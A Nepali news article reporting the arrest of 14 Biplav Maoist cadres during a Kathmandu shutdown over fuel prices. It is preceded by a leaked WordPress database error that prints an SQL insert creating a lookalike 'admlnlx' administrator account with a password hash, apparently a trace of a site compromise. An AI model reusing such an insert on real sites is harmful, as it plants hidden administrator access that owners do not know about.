WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Ba1ZPsrOF96HqBqcLWeiCuKPwpZFnp1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:27:44', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ७ –
पेट्रोलियम पदार्थको मूल्यवृद्धि फिर्ता लिनुपर्ने लगायतका माग राखेर काठमाडौं उपत्यका बन्द गराउँदै हिँडेका विप्लव माओवादीका १४ जना कार्यकर्ताहरुलाई प्रहरीले पक्राउ गरेको छ ।
बिहीबार बिहानै पुरानो बसपार्क, रत्नपार्कलगायतका क्षेत्रमा नारा जुलुस गरेर बन्द गराउँदै हिडेका १४ जनालाई पक्राउ गरिएको काठमाडौं प्रहरी परिसरका एसपी प्रद्युम्न कार्कीले बताए ।
एसपी कार्कीका अनुसार बिहान ६ बजे उनीहरु पक्राउ परेका हुन् । बन्दको, आंशिक प्रभाव परे पनि अहिलेसम्म तोडफोड, आगजनीका अपि्रय घटनाहरु भएका छैनन् ।
बन्दलाई लक्षित गरेर काठमाडौं प्रहरी परिसर, अपराध महाशाखा, महानगरीय प्रहरी आयुक्तको कार्यालय लगायतबाट ठूलो संख्यामा सादा पोशाकमा प्रहरी परिचालन भएका छन् ।
काठमाडौंमा बन्दको आंशिक प्रभाव परेको छ । रिंगरोडमा सार्वजनिक यातायातका साधन निर्वाध चलिरहेका भए पनि कतिपय भित्रीरुटमा सार्बजनिक यातायातका साधन कम चलेका छन् । शिक्षण संस्था बन्द भए पनि बजार, पसल भने फाट्ट फुट्ट खुलेका छन् ।